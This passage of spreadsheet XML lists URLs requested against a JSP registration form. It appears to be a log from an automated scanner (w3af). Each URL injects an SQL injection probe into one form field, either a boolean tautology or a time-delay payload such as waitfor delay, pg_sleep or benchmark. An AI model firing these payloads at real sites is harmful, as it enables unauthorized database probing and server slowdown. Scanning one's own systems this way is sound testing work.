  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=1+or+pg_sleep(5)&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=1'+or+pg_sleep(5)+or+'1'='1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=1"+or+pg_sleep(5)+or+"1"="1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6"+or+"6"="6&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=6"+and+"6"="7&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=6'+or+'6'='6&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=6'+and+'6'='7&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=6+or+6=6+&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=6+and+6=7+&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1;waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1);waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1));waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1';waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1');waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1'));waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1+or+benchmark(2500000,md5(1))&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1+or+pg_sleep(5)&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1'+or+pg_sleep(5)+or+'1'='1&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=1"+or+pg_sleep(5)+or+"1"="1&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24"+or+"92"="92&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24"+and+"92"="93&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24'+or+'92'='92&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24'+and+'92'='93&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24+or+92=92+&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24+and+92=93+&amp;login=56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18"+or+"18"="18&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=18"+and+"18"="19&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=18'+or+'18'='18&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=18'+and+'18'='19&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=18+or+18=18+&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=18+and+18=19+&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1;waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1);waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1));waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1';waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1');waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1'));waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1+or+benchmark(2500000,md5(1))&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1+or+pg_sleep(5)&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1'+or+pg_sleep(5)+or+'1'='1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=1"+or+pg_sleep(5)+or+"1"="1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63"+or+"63"="63&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=63"+and+"63"="64&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=63'+or+'63'='63&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=63'+and+'63'='64&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=63+or+63=63+&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=63+and+63=64+&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1;waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1);waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1));waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1';waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1');waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1'));waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1+or+benchmark(2500000,md5(1))&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1+or+pg_sleep(5)&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1'+or+pg_sleep(5)+or+'1'='1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=1"+or+pg_sleep(5)+or+"1"="1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21"+or+"21"="21&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=21"+and+"21"="22&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=21'+or+'21'='21&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=21'+and+'21'='22&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=21+or+21=21+&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=21+and+21=22+&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1;waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1);waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1));waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1';waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1');waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'));waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1+or+benchmark(2500000,md5(1))&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1+or+pg_sleep(5)&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'+or+pg_sleep(5)+or+'1'='1&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1"+or+pg_sleep(5)+or+"1"="1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98"+or+"98"="98&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=98"+and+"98"="99&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=98'+or+'98'='98&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=98'+and+'98'='99&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=98+or+98=98+&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=98+and+98=99+&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1;waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1);waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1));waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1';waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1');waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
